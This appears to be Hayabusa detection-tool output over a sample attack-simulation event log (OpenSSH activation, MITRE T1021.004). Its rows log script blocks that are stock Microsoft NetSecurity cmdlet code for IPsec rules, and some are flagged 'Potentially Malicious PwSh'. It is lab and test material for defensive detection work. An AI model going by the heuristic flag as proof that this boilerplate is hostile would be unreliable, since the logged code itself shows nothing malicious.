$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 